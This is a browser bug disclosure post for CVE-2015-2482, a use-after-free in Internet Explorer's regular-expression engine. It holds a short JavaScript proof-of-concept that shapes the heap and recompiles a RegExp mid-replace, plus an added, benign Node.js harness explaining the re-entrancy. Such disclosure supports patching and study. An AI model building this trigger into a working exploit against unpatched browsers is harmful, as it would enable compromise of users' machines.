Recompiling the regular expression pattern (RegExp.prototype.compile) from inside a replace callback can cause the code to reuse a freed string, but only if that string has first been freed from the cache by allocating and freeing a number of strings of a certain size.
CVE-2015-2482: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482
ZDI-15-515: http://www.zerodayinitiative.com/advisories/ZDI-15-515/
MS15-108: https://technet.microsoft.com/en-us/library/security/MS15-108
Repro:
<script>
// Global regexp: replace() invokes the callback for each match.
var r=new RegExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
"A".replace(r, function (){
  // Allocate and free a number of strings of a certain size so the
  // cached string gets freed.
  for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
  // Recompile the pattern while the replace is still in progress.
  r.compile();
});
</script>
Repro-in-a-tweet:
https://twitter.com/berendjanwever/status/654048253047140352

Cheers,
SkyLined

Follow me on twitter for a new browser bug every* day!
https://twitter.com/berendjanwever
(* might be more than one some days)
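Added example, not part of the original paste: a small Node.js harness that reproduces the shape of the repro (a global replace whose callback churns the heap and then recompiles the live RegExp) and records what the callback observes. It shows the re-entrancy the bug depends on: user code runs while the engine is in the middle of a replace and mutates the pattern the engine is working with. A spec-compliant engine (ES2015+ RegExp.prototype[Symbol.replace]) collects all matches before calling the callback, so the recompile cannot touch an in-progress match; the advisory above is about an engine that still held a string from the old pattern state. The function name replaceWithRecompile and the sample input "AAA" are assumptions for this example.

```javascript
// Added example (not from the original paste). Mirrors the repro's structure:
// replace() with a global regexp, a callback that allocates and frees strings
// of a fixed size (the heap-shaping step), then recompiles the regexp that is
// still being used by the surrounding replace().

function replaceWithRecompile(input, pattern, newPattern) {
  var r = new RegExp(pattern, "g");
  var calls = [];
  var out = input.replace(r, function (m) {
    // Record what the callback sees: the match and the pattern source at the
    // time of the call. In a spec-compliant engine the source only changes
    // after the first callback because matches were gathered up front.
    calls.push({ match: m, sourceSeen: r.source });
    // Heap-shaping step copied from the repro: allocate and drop 16 strings of
    // the same size. Harmless here; in the affected engine this is what got the
    // cached string freed.
    for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
    // Re-entrant mutation: recompile the live regexp mid-replace.
    r.compile(newPattern, "g");
    return "_";
  });
  return {
    output: out,
    calls: calls,
    finalSource: r.source,
    lastIndex: r.lastIndex
  };
}

// Usage (constructed input): three matches, callback sees "A" once and the
// recompiled "B" afterwards, yet all three original matches are still replaced.
replaceWithRecompile("AAA", "A", "B");
```

Run it under Node.js: every match of the original pattern is replaced even though the pattern was swapped out during the first callback, which is the behaviour the ES2015 algorithm guarantees by snapshotting the match list before any callback runs. The MSIE bug is the opposite case, where engine state from before the recompile was still in use afterwards.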